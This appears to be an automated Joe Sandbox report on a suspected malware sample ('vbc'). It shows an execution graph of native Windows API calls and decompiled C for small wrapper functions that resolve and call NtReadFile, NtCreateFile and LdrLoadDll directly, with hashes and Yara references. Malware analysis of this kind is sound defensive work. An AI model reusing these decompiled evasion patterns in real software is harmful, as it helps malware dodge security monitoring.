                                                    execution_graph 41749 41d460 41752 419c00 41749->41752 41753 419c26 41752->41753 41764 408b70 41753->41764 41755 419c32 41763 419c79 41755->41763 41772 40d180 41755->41772 41757 419c47 41761 419c5c 41757->41761 41820 418940 41757->41820 41760 419c6b 41762 418940 2 API calls 41760->41762 41784 40a620 41761->41784 41762->41763 41765 408b7d 41764->41765 41823 408ac0 41764->41823 41767 408b84 41765->41767 41835 408a60 41765->41835 41767->41755 41773 40d1ac 41772->41773 42253 40a020 41773->42253 41775 40d1be 42257 40d090 41775->42257 41778 40d1f1 41781 40d202 41778->41781 41783 418720 2 API calls 41778->41783 41779 40d1d9 41780 40d1e4 41779->41780 41782 418720 2 API calls 41779->41782 41780->41757 41781->41757 41782->41780 41783->41781 41785 40a645 41784->41785 41786 40a020 LdrLoadDll 41785->41786 41787 40a69c 41786->41787 42276 409ca0 41787->42276 41789 40a6c2 41819 40a913 41789->41819 42285 4133b0 41789->42285 41791 40a707 41791->41819 42288 4079e0 41791->42288 41793 40a74b 41793->41819 42295 418790 41793->42295 41797 40a7a1 41798 40a7a8 41797->41798 42307 4182a0 41797->42307 41799 41a0c0 2 API calls 41798->41799 41801 40a7b5 41799->41801 41801->41760 41803 40a7f2 41804 41a0c0 2 API calls 41803->41804 41805 40a7f9 41804->41805 41805->41760 41806 40a802 41807 40d210 3 API calls 41806->41807 41808 40a876 41807->41808 41808->41798 41809 40a881 41808->41809 41810 41a0c0 2 API calls 41809->41810 41811 40a8a5 41810->41811 42312 4182f0 41811->42312 41814 4182a0 2 API calls 41815 40a8e0 41814->41815 41815->41819 42317 4180b0 41815->42317 41818 418940 2 API calls 41818->41819 41819->41760 41821 4191f0 LdrLoadDll 41820->41821 41822 41895f ExitProcess 41821->41822 41822->41761 41854 416e60 41823->41854 41827 408ae6 41827->41765 41828 408adc 41828->41827 41861 419540 41828->41861 41830 408b23 41830->41827 41872 4088e0 41830->41872 41832 408b43 41878 408330 LdrLoadDll 41832->41878 41834 408b55 41834->41765 41836 408a7a 41835->41836 41837 419830 LdrLoadDll 41835->41837 42228 419830 41836->42228 41837->41836 41840 419830 LdrLoadDll 41841 408aa1 41840->41841 41842 40cf80 41841->41842 41843 40cf99 41842->41843 42236 409ea0 41843->42236 41845 40cfac 42240 418470 41845->42240 41848 408b95 41848->41755 41850 40cfd2 41851 40cffd 41850->41851 42246 4184f0 41850->42246 41852 418720 2 API calls 41851->41852 41852->41848 41855 416e6f 41854->41855 41879 413e60 41855->41879 41857 408ad3 41858 416d10 41857->41858 41885 418890 41858->41885 41862 419559 41861->41862 41892 413a60 41862->41892 41864 419571 41865 41957a 41864->41865 41931 419380 41864->41931 41865->41830 41867 41958e 41867->41865 41949 418190 41867->41949 41869 4195c2 41869->41869 41954 41a0c0 41869->41954 42206 406e30 41872->42206 41874 408901 41874->41832 41875 4088fa 41875->41874 42219 4070f0 41875->42219 41878->41834 41880 413e7a 41879->41880 41883 413e6e 41879->41883 41880->41857 41882 413fcc 41882->41857 41883->41880 41884 4142e0 LdrLoadDll 41883->41884 41884->41882 41887 416d25 41885->41887 41888 4191f0 41885->41888 41887->41828 41889 419200 41888->41889 41891 419222 41888->41891 41890 413e60 LdrLoadDll 41889->41890 41890->41891 41891->41887 41893 413d95 41892->41893 41894 413a74 41892->41894 41893->41864 41894->41893 41957 417ee0 41894->41957 41897 413ba0 41960 4185f0 41897->41960 41898 413b83 42017 4186f0 LdrLoadDll 41898->42017 41901 413b8d 41901->41864 41902 413bc7 41903 41a0c0 2 API calls 41902->41903 41905 413bd3 41903->41905 41904 413d59 41907 418720 2 API calls 41904->41907 41905->41901 41905->41904 41906 413d6f 41905->41906 41911 413c62 41905->41911 42026 4137a0 LdrLoadDll NtReadFile NtClose 41906->42026 41908 413d60 41907->41908 41908->41864 41910 413d82 41910->41864 41912 413cc9 41911->41912 41914 413c71 41911->41914 41912->41904 41913 413cdc 41912->41913 42019 418570 41913->42019 41916 413c76 41914->41916 41917 413c8a 41914->41917 42018 413660 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 41916->42018 41920 413ca7 41917->41920 41921 413c8f 41917->41921 41920->41908 41975 413420 41920->41975 41963 413700 41921->41963 41923 413c80 41923->41864 41925 413d3c 42023 418720 41925->42023 41926 413c9d 41926->41864 41929 413cbf 41929->41864 41930 413d48 41930->41864 41932 419391 41931->41932 41933 4193a3 41932->41933 42044 41a040 41932->42044 41933->41867 41935 4193c4 42048 413070 41935->42048 41937 419410 41937->41867 41938 4193e7 41938->41937 41939 413070 3 API calls 41938->41939 41940 419409 41939->41940 41940->41937 42080 4143a0 41940->42080 41942 41949a 41943 4194aa 41942->41943 42174 419190 LdrLoadDll 41942->42174 42090 419000 41943->42090 41946 4194d8 42169 418150 41946->42169 41950 4191f0 LdrLoadDll 41949->41950 41951 4181ac 41950->41951 42202 8dfae8 LdrInitializeThunk 41951->42202 41952 4181c7 41952->41869 42203 418900 41954->42203 41956 4195e9 41956->41830 41958 4191f0 LdrLoadDll 41957->41958 41959 413b54 41958->41959 41959->41897 41959->41898 41959->41901 41961 4191f0 LdrLoadDll 41960->41961 41962 41860c NtCreateFile 41961->41962 41962->41902 41964 41371c 41963->41964 41965 418570 LdrLoadDll 41964->41965 41966 41373d 41965->41966 41967 413744 41966->41967 41968 413758 41966->41968 41970 418720 2 API calls 41967->41970 41969 418720 2 API calls 41968->41969 41971 413761 41969->41971 41972 41374d 41970->41972 42027 41a2d0 LdrLoadDll RtlAllocateHeap 41971->42027 41972->41926 41974 41376c 41974->41926 41976 41346b 41975->41976 41977 41349e 41975->41977 41979 418570 LdrLoadDll 41976->41979 41978 4135e9 41977->41978 41984 4134ba 41977->41984 41980 418570 LdrLoadDll 41978->41980 41981 413486 41979->41981 41983 413604 41980->41983 41982 418720 2 API calls 41981->41982 41985 41348f 41982->41985 42040 4185b0 LdrLoadDll 41983->42040 41986 418570 LdrLoadDll 41984->41986 41985->41929 41987 4134d5 41986->41987 41989 4134f1 41987->41989 41990 4134dc 41987->41990 41993 4134f6 41989->41993 41994 41350c 41989->41994 41992 418720 2 API calls 41990->41992 41991 41363e 41996 418720 2 API calls 41991->41996 41997 4134e5 41992->41997 41995 418720 2 API calls 41993->41995 42002 413511 41994->42002 42028 41a290 41994->42028 41998 4134ff 41995->41998 41999 413649 41996->41999 41997->41929 41998->41929 41999->41929 42010 413523 42002->42010 42031 4186a0 42002->42031 42003 413577 42004 41358e 42003->42004 42039 418530 LdrLoadDll 42003->42039 42006 413595 42004->42006 42007 4135aa 42004->42007 42008 418720 2 API calls 42006->42008 42009 418720 2 API calls 42007->42009 42008->42010 42011 4135b3 42009->42011 42010->41929 42012 4135df 42011->42012 42034 419e90 42011->42034 42012->41929 42014 4135ca 42015 41a0c0 2 API calls 42014->42015 42016 4135d3 42015->42016 42016->41929 42017->41901 42018->41923 42020 413d24 42019->42020 42021 4191f0 LdrLoadDll 42019->42021 42022 4185b0 LdrLoadDll 42020->42022 42021->42020 42022->41925 42024 41873c NtClose 42023->42024 42025 4191f0 LdrLoadDll 42023->42025 42024->41930 42025->42024 42026->41910 42027->41974 42041 4188c0 42028->42041 42030 41a2a8 42030->42002 42032 4191f0 LdrLoadDll 42031->42032 42033 4186bc NtReadFile 42032->42033 42033->42003 42035 419eb4 42034->42035 42036 419e9d 42034->42036 42035->42014 42036->42035 42037 41a290 2 API calls 42036->42037 42038 419ecb 42037->42038 42038->42014 42039->42004 42040->41991 42042 4191f0 LdrLoadDll 42041->42042 42043 4188dc RtlAllocateHeap 42042->42043 42043->42030 42045 41a057 42044->42045 42175 4187d0 42045->42175 42047 41a06d 42047->41935 42049 413081 42048->42049 42051 413089 42048->42051 42049->41938 42050 41335c 42050->41938 42051->42050 42178 41b270 42051->42178 42053 4130dd 42054 41b270 2 API calls 42053->42054 42058 4130e8 42054->42058 42055 413136 42057 41b270 2 API calls 42055->42057 42061 41314a 42057->42061 42058->42055 42059 41b3a0 3 API calls 42058->42059 42189 41b310 LdrLoadDll RtlAllocateHeap RtlFreeHeap 42058->42189 42059->42058 42060 4131a7 42062 41b270 2 API calls 42060->42062 42061->42060 42183 41b3a0 42061->42183 42064 4131bd 42062->42064 42065 4131fa 42064->42065 42067 41b3a0 3 API calls 42064->42067 42066 41b270 2 API calls 42065->42066 42068 413205 42066->42068 42067->42064 42069 41b3a0 3 API calls 42068->42069 42075 41323f 42068->42075 42069->42068 42071 413334 42191 41b2d0 LdrLoadDll RtlFreeHeap 42071->42191 42073 41333e 42192 41b2d0 LdrLoadDll RtlFreeHeap 42073->42192 42190 41b2d0 LdrLoadDll RtlFreeHeap 42075->42190 42076 413348 42193 41b2d0 LdrLoadDll RtlFreeHeap 42076->42193 42078 413352 42194 41b2d0 LdrLoadDll RtlFreeHeap 42078->42194 42081 4143b1 42080->42081 42082 413a60 8 API calls 42081->42082 42084 4143c7 42082->42084 42083 41441a 42083->41942 42084->42083 42085 414402 42084->42085 42086 414415 42084->42086 42087 41a0c0 2 API calls 42085->42087 42088 41a0c0 2 API calls 42086->42088 42089 414407 42087->42089 42088->42083 42089->41942 42195 418ec0 42090->42195 42093 418ec0 LdrLoadDll 42094 41901d 42093->42094 42095 418ec0 LdrLoadDll 42094->42095 42096 419026 42095->42096 42097 418ec0 LdrLoadDll 42096->42097 42098 41902f 42097->42098 42099 418ec0 LdrLoadDll 42098->42099 42100 419038 42099->42100 42101 418ec0 LdrLoadDll 42100->42101 42102 419041 42101->42102 42103 418ec0 LdrLoadDll 42102->42103 42104 41904d 42103->42104 42105 418ec0 LdrLoadDll 42104->42105 42106 419056 42105->42106 42107 418ec0 LdrLoadDll 42106->42107 42108 41905f 42107->42108 42109 418ec0 LdrLoadDll 42108->42109 42110 419068 42109->42110 42111 418ec0 LdrLoadDll 42110->42111 42112 419071 42111->42112 42113 418ec0 LdrLoadDll 42112->42113 42114 41907a 42113->42114 42115 418ec0 LdrLoadDll 42114->42115 42116 419086 42115->42116 42117 418ec0 LdrLoadDll 42116->42117 42118 41908f 42117->42118 42119 418ec0 LdrLoadDll 42118->42119 42120 419098 42119->42120 42121 418ec0 LdrLoadDll 42120->42121 42122 4190a1 42121->42122 42123 418ec0 LdrLoadDll 42122->42123 42124 4190aa 42123->42124 42125 418ec0 LdrLoadDll 42124->42125 42126 4190b3 42125->42126 42127 418ec0 LdrLoadDll 42126->42127 42128 4190bf 42127->42128 42129 418ec0 LdrLoadDll 42128->42129 42130 4190c8 42129->42130 42131 418ec0 LdrLoadDll 42130->42131 42132 4190d1 42131->42132 42133 418ec0 LdrLoadDll 42132->42133 42134 4190da 42133->42134 42135 418ec0 LdrLoadDll 42134->42135 42136 4190e3 42135->42136 42137 418ec0 LdrLoadDll 42136->42137 42138 4190ec 42137->42138 42139 418ec0 LdrLoadDll 42138->42139 42140 4190f8 42139->42140 42141 418ec0 LdrLoadDll 42140->42141 42142 419101 42141->42142 42143 418ec0 LdrLoadDll 42142->42143 42144 41910a 42143->42144 42145 418ec0 LdrLoadDll 42144->42145 42146 419113 42145->42146 42147 418ec0 LdrLoadDll 42146->42147 42148 41911c 42147->42148 42149 418ec0 LdrLoadDll 42148->42149 42150 419125 42149->42150 42151 418ec0 LdrLoadDll 42150->42151 42152 419131 42151->42152 42153 418ec0 LdrLoadDll 42152->42153 42154 41913a 42153->42154 42155 418ec0 LdrLoadDll 42154->42155 42156 419143 42155->42156 42157 418ec0 LdrLoadDll 42156->42157 42158 41914c 42157->42158 42159 418ec0 LdrLoadDll 42158->42159 42160 419155 42159->42160 42161 418ec0 LdrLoadDll 42160->42161 42162 41915e 42161->42162 42163 418ec0 LdrLoadDll 42162->42163 42164 41916a 42163->42164 42165 418ec0 LdrLoadDll 42164->42165 42166 419173 42165->42166 42167 418ec0 LdrLoadDll 42166->42167 42168 41917c 42167->42168 42168->41946 42170 4191f0 LdrLoadDll 42169->42170 42171 41816c 42170->42171 42201 8dfdc0 LdrInitializeThunk 42171->42201 42172 418183 42172->41867 42174->41943 42176 4187ec NtAllocateVirtualMemory 42175->42176 42177 4191f0 LdrLoadDll 42175->42177 42176->42047 42177->42176 42179 41b280 42178->42179 42180 41b286 42178->42180 42179->42053 42181 41a290 2 API calls 42180->42181 42182 41b2ac 42181->42182 42182->42053 42184 41b310 42183->42184 42185 41a290 2 API calls 42184->42185 42187 41b36d 42184->42187 42186 41b34a 42185->42186 42188 41a0c0 2 API calls 42186->42188 42187->42061 42188->42187 42189->42058 42190->42071 42191->42073 42192->42076 42193->42078 42194->42050 42196 418edb 42195->42196 42197 413e60 LdrLoadDll 42196->42197 42198 418efb 42197->42198 42199 413e60 LdrLoadDll 42198->42199 42200 418fa7 42198->42200 42199->42200 42200->42093 42201->42172 42202->41952 42204 41891c RtlFreeHeap 42203->42204 42205 4191f0 LdrLoadDll 42203->42205 42204->41956 42205->42204 42207 406e40 42206->42207 42208 406e3b 42206->42208 42209 41a040 2 API calls 42207->42209 42208->41875 42215 406e65 42209->42215 42210 406ec8 42210->41875 42211 418150 2 API calls 42211->42215 42212 406ece 42214 406ef4 42212->42214 42216 418850 2 API calls 42212->42216 42214->41875 42215->42210 42215->42211 42215->42212 42218 41a040 2 API calls 42215->42218 42222 418850 42215->42222 42217 406ee5 42216->42217 42217->41875 42218->42215 42220 40710e 42219->42220 42221 418850 2 API calls 42219->42221 42220->41832 42221->42220 42223 4191f0 LdrLoadDll 42222->42223 42224 41886c 42223->42224 42227 8dfb68 LdrInitializeThunk 42224->42227 42225 418883 42225->42215 42227->42225 42229 419853 42228->42229 42232 409b50 42229->42232 42233 409b74 42232->42233 42234 409bb0 LdrLoadDll 42233->42234 42235 408a8b 42233->42235 42234->42235 42235->41840 42238 409ec3 42236->42238 42237 409f40 42237->41845 42238->42237 42251 417f20 LdrLoadDll 42238->42251 42241 4191f0 LdrLoadDll 42240->42241 42242 40cfbb 42241->42242 42242->41848 42243 418a60 42242->42243 42244 418a7f LookupPrivilegeValueW 42243->42244 42245 4191f0 LdrLoadDll 42243->42245 42244->41850 42245->42244 42247 4191f0 LdrLoadDll 42246->42247 42248 41850c 42247->42248 42252 8dfed0 LdrInitializeThunk 42248->42252 42249 41852b 42249->41851 42251->42237 42252->42249 42254 40a047 42253->42254 42255 409ea0 LdrLoadDll 42254->42255 42256 40a076 42255->42256 42256->41775 42258 40d0aa 42257->42258 42266 40d160 42257->42266 42259 409ea0 LdrLoadDll 42258->42259 42260 40d0cc 42259->42260 42267 4181d0 42260->42267 42262 40d10e 42270 418210 42262->42270 42265 418720 2 API calls 42265->42266 42266->41778 42266->41779 42268 4191f0 LdrLoadDll 42267->42268 42269 4181ec 42268->42269 42269->42262 42271 4191f0 LdrLoadDll 42270->42271 42272 41822c 42271->42272 42275 8e07ac LdrInitializeThunk 42272->42275 42273 40d154 42273->42265 42275->42273 42278 409ca1 42276->42278 42277 409cad 42277->41789 42278->42277 42279 409cca 42278->42279 42280 409cfc 42278->42280 42322 417f60 LdrLoadDll 42279->42322 42323 417f60 LdrLoadDll 42280->42323 42282 409d0d 42282->41789 42284 409cec 42284->41789 42286 40d210 3 API calls 42285->42286 42287 4133d6 42285->42287 42286->42287 42287->41791 42289 4079f9 42288->42289 42324 407720 42288->42324 42291 407a1d 42289->42291 42292 407720 19 API calls 42289->42292 42291->41793 42293 407a0a 42292->42293 42293->42291 42342 40d480 10 API calls 42293->42342 42296 4191f0 LdrLoadDll 42295->42296 42297 4187ac 42296->42297 42461 8dfea0 LdrInitializeThunk 42297->42461 42298 40a782 42300 40d210 42298->42300 42301 40d22d 42300->42301 42462 418250 42301->42462 42304 40d275 42304->41797 42305 4182a0 2 API calls 42306 40d29e 42305->42306 42306->41797 42308 4191f0 LdrLoadDll 42307->42308 42309 4182bc 42308->42309 42468 8dfc60 LdrInitializeThunk 42309->42468 42310 40a7e5 42310->41803 42310->41806 42313 4191f0 LdrLoadDll 42312->42313 42314 41830c 42313->42314 42469 8dfc90 LdrInitializeThunk 42314->42469 42315 40a8b9 42315->41814 42318 4191f0 LdrLoadDll 42317->42318 42319 4180cc 42318->42319 42470 8e0078 LdrInitializeThunk 42319->42470 42320 40a90c 42320->41818 42322->42284 42323->42282 42325 406e30 4 API calls 42324->42325 42330 40773a 42324->42330 42325->42330 42326 4079c9 42326->42289 42327 4079bf 42328 4070f0 2 API calls 42327->42328 42328->42326 42330->42326 42330->42327 42332 418190 2 API calls 42330->42332 42334 418720 LdrLoadDll NtClose 42330->42334 42337 40a920 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 42330->42337 42340 4180b0 2 API calls 42330->42340 42343 417fa0 42330->42343 42346 407550 42330->42346 42358 40d360 LdrLoadDll NtClose 42330->42358 42359 418020 LdrLoadDll 42330->42359 42360 418050 LdrLoadDll 42330->42360 42361 4180e0 LdrLoadDll 42330->42361 42362 407320 42330->42362 42378 405ea0 LdrLoadDll 42330->42378 42332->42330 42334->42330 42337->42330 42340->42330 42342->42291 42344 4191f0 LdrLoadDll 42343->42344 42345 417fbc 42344->42345 42345->42330 42347 407566 42346->42347 42379 417b10 42347->42379 42349 40757f 42357 4076f1 42349->42357 42400 407130 42349->42400 42351 407665 42352 407320 11 API calls 42351->42352 42351->42357 42353 407693 42352->42353 42354 418190 2 API calls 42353->42354 42353->42357 42355 4076c8 42354->42355 42356 418790 2 API calls 42355->42356 42355->42357 42356->42357 42357->42330 42358->42330 42359->42330 42360->42330 42361->42330 42363 407349 42362->42363 42440 407290 42363->42440 42366 418790 2 API calls 42367 40735c 42366->42367 42367->42366 42368 4073e7 42367->42368 42371 4073e2 42367->42371 42448 40d3e0 42367->42448 42368->42330 42369 418720 2 API calls 42370 40741a 42369->42370 42370->42368 42372 417fa0 LdrLoadDll 42370->42372 42371->42369 42373 40747f 42372->42373 42373->42368 42452 417fe0 42373->42452 42375 4074e3 42375->42368 42376 413a60 8 API calls 42375->42376 42377 407538 42376->42377 42377->42330 42378->42330 42380 41a290 2 API calls 42379->42380 42381 417b27 42380->42381 42407 408170 42381->42407 42383 417b42 42384 417b80 42383->42384 42385 417b69 42383->42385 42388 41a040 2 API calls 42384->42388 42386 41a0c0 2 API calls 42385->42386 42387 417b76 42386->42387 42387->42349 42389 417bba 42388->42389 42390 41a040 2 API calls 42389->42390 42391 417bd3 42390->42391 42397 417e74 42391->42397 42413 41a080 42391->42413 42394 417e60 42395 41a0c0 2 API calls 42394->42395 42396 417e6a 42395->42396 42396->42349 42398 41a0c0 2 API calls 42397->42398 42399 417ec9 42398->42399 42399->42349 42401 40722f 42400->42401 42402 407145 42400->42402 42401->42351 42402->42401 42403 413a60 8 API calls 42402->42403 42404 4071b2 42403->42404 42405 41a0c0 2 API calls 42404->42405 42406 4071d9 42404->42406 42405->42406 42406->42351 42408 408195 42407->42408 42409 409b50 LdrLoadDll 42408->42409 42410 4081c8 42409->42410 42412 4081ed 42410->42412 42416 40b350 42410->42416 42412->42383 42434 418810 42413->42434 42417 40b37c 42416->42417 42418 418470 LdrLoadDll 42417->42418 42419 40b395 42418->42419 42420 40b39c 42419->42420 42427 4184b0 42419->42427 42420->42412 42424 40b3d7 42425 418720 2 API calls 42424->42425 42426 40b3fa 42425->42426 42426->42412 42428 4184cc 42427->42428 42429 4191f0 LdrLoadDll 42427->42429 42433 8dfbb8 LdrInitializeThunk 42428->42433 42429->42428 42430 40b3bf 42430->42420 42432 418aa0 LdrLoadDll 42430->42432 42432->42424 42433->42430 42435 4191f0 LdrLoadDll 42434->42435 42436 41882c 42435->42436 42439 8e0048 LdrInitializeThunk 42436->42439 42437 417e59 42437->42394 42437->42397 42439->42437 42441 4072a8 42440->42441 42442 409b50 LdrLoadDll 42441->42442 42443 4072c3 42442->42443 42444 413e60 LdrLoadDll 42443->42444 42445 4072d3 42444->42445 42446 4072dc PostThreadMessageW 42445->42446 42447 4072f0 42445->42447 42446->42447 42447->42367 42449 40d3f3 42448->42449 42455 418120 42449->42455 42453 417ffc 42452->42453 42454 4191f0 LdrLoadDll 42452->42454 42453->42375 42454->42453 42456 4191f0 LdrLoadDll 42455->42456 42457 41813c 42456->42457 42460 8dfd8c LdrInitializeThunk 42457->42460 42458 40d41e 42458->42367 42460->42458 42461->42298 42463 41826c 42462->42463 42464 4191f0 LdrLoadDll 42462->42464 42467 8dffb4 LdrInitializeThunk 42463->42467 42464->42463 42465 40d26e 42465->42304 42465->42305 42467->42465 42468->42310 42469->42315 42470->42320 42474 8df900 LdrInitializeThunk

                                                    Executed Functions

                                                    Function 0041869D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60filenativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 41869d-41869e 1 4186a0-4186e9 call 4191f0 NtReadFile 0->1 2 418672-418699 0->2
                                                    APIs
                                                    • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: *9A$A:A
                                                    • API String ID: 2738559852-3393056465
                                                    • Opcode ID: 440a9c7ae0bab30013401e29e9defbe0b8e429ac0d839d9d3a50a4294f0c9365
                                                    • Instruction ID: 5c1d1326be290633bbf7c449a0da179942d7f590496206b3234f5423b5ffce47
                                                    • Opcode Fuzzy Hash: 440a9c7ae0bab30013401e29e9defbe0b8e429ac0d839d9d3a50a4294f0c9365
                                                    • Instruction Fuzzy Hash: F31190B2200109ABCB08DF8DDC91DEB73ADAF8C754B158249BA1D93241D634EC518BA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004186A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 6 4186a0-4186e9 call 4191f0 NtReadFile
                                                    C-Code - Quality: 37%
                                                    			E004186A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191F0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a41
				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4); // executed
				return _t18;
			}






                                                    0x004186a3
                                                    0x004186af
                                                    0x004186b7
                                                    0x004186bc
                                                    0x004186e5
                                                    0x004186e9

                                                    APIs
                                                    • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: A:A
                                                    • API String ID: 2738559852-2859176346
                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                    • Instruction ID: f080bec4c040545e3dab2a82d2c0628179b57ce59769f180118a0d9c745142a3
                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                    • Instruction Fuzzy Hash: 84F0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00409B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 237 409b50-409b6c 238 409b74-409b79 237->238 239 409b6f call 41af90 237->239 240 409b7b-409b7e 238->240 241 409b7f-409b8d call 41b3b0 238->241 239->238 244 409b9d-409bae call 419730 241->244 245 409b8f-409b9a call 41b630 241->245 250 409bb0-409bc4 LdrLoadDll 244->250 251 409bc7-409bca 244->251 245->244 250->251
                                                    C-Code - Quality: 100%
                                                    			E00409B50(void* __ebx, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t31;
				void* _t32;
				void* _t33;

				_v8 =  &_v536;
				_t15 = E0041AF90( &_v12, 0x104, _a8);
				_t32 = _t31 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B3B0(__eflags, _v8);
					_t33 = _t32 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B630(__ebx,  &_v12, 0);
						_t33 = _t33 + 8;
					}
					_t18 = E00419730(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                    0x00409b6c
                                                    0x00409b6f
                                                    0x00409b74
                                                    0x00409b79
                                                    0x00409b83
                                                    0x00409b88
                                                    0x00409b8b
                                                    0x00409b8d
                                                    0x00409b95
                                                    0x00409b9a
                                                    0x00409b9a
                                                    0x00409ba1
                                                    0x00409ba9
                                                    0x00409bac
                                                    0x00409bae
                                                    0x00409bc2
                                                    0x00000000
                                                    0x00409bc4
                                                    0x00409bca
                                                    0x00409b7e
                                                    0x00409b7e
                                                    0x00409b7e

                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 95fb8e7be991e7a3834cfd23532fdb6265e305c358471754a12ee14398f87ec4
                                                    • Instruction ID: afa3cb2b82f763e4c143b2584a44dcb3567b2da14c64915af70a02bec35298af
                                                    • Opcode Fuzzy Hash: 95fb8e7be991e7a3834cfd23532fdb6265e305c358471754a12ee14398f87ec4
                                                    • Instruction Fuzzy Hash: 1B0152B5D0020DABDB10DAA1DD42FDEB378AB54308F0041AAE918A7281F634EB54CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004185F0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 252 4185f0-418641 call 4191f0 NtCreateFile
                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                    • Instruction ID: 6e88bdc2a8d45a62887e6f3ef0105f77e511591ccf53121fd16df0132ea8aa9a
                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                    • Instruction Fuzzy Hash: 17F0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418642, Relevance: 1.5, APIs: 1, Instructions: 32filenativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 255 418642-41864d 256 41860b-418641 NtCreateFile 255->256 257 41864f 255->257
                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: be5f7221360a20a6c443f830ae1769a090a9f8139e61cb02de094cd56315abc9
                                                    • Instruction ID: 4edb876a31e947ab0c02694570741f517bd03378cb2f4498f26c29c628b4aa59
                                                    • Opcode Fuzzy Hash: be5f7221360a20a6c443f830ae1769a090a9f8139e61cb02de094cd56315abc9
